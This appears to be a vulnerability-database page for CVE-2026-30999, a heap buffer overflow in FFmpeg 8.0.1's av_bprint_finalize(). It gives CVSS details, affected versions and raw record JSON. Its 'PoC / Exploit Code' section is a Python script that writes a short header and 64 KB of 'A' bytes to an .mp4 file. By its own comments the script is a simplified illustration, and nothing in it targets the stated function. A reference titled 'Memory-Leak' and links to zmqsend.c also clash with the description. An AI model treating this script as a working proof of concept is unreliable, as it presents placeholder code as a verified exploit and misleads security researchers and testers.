Security Vulnerability Report
中文
CVE-2026-30999 CVSS 7.5 HIGH

CVE-2026-30999

Published: 2026-04-13 15:17:33
Last Modified: 2026-04-23 20:10:37

Description

A heap buffer overflow in the av_bprint_finalize() function of FFmpeg v8.0.1 allows attackers to cause a Denial of Service (DoS) via a crafted input.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:ffmpeg:ffmpeg:*:*:*:*:*:*:*:* - VULNERABLE
FFmpeg 8.0.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import struct # PoC to trigger heap buffer overflow in av_bprint_finalize # This script generates a crafted file designed to corrupt memory def generate_poc_file(filename): with open(filename, 'wb') as f: # File header (simplified for illustration) f.write(b'\x00\x00\x00\x20') # Malicious payload designed to trigger the overflow # In a real scenario, this would be specific data that causes BPrint to miscalculate size overflow_payload = b'A' * 0x10000 f.write(overflow_payload) print(f"[+] PoC file generated: {filename}") if __name__ == "__main__": generate_poc_file("crash_ffmpeg.mp4")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-30999", "sourceIdentifier": "[email protected]", "published": "2026-04-13T15:17:32.827", "lastModified": "2026-04-23T20:10:36.647", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A heap buffer overflow in the av_bprint_finalize() function of FFmpeg v8.0.1 allows attackers to cause a Denial of Service (DoS) via a crafted input."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-122"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ffmpeg:ffmpeg:*:*:*:*:*:*:*:*", "versionEndIncluding": "8.0.1", "matchCriteriaId": "CC0744C3-5732-466C-B936-078E938A66B6"}]}]}], "references": [{"url": "https://excellent-oatmeal-319.notion.site/CVE-2026-30999-Memory-Leak-e0d88ac53e2e42c1b5ef9aa3497e27b6", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://ffmpeg.org/doxygen/7.0/zmqsend_8c_source.html", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/FFmpeg/FFmpeg/blob/master/tools/zmqsend.c", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.ffmpeg.org/download.html", "source": "[email protected]", "tags": ["Product"]}]}}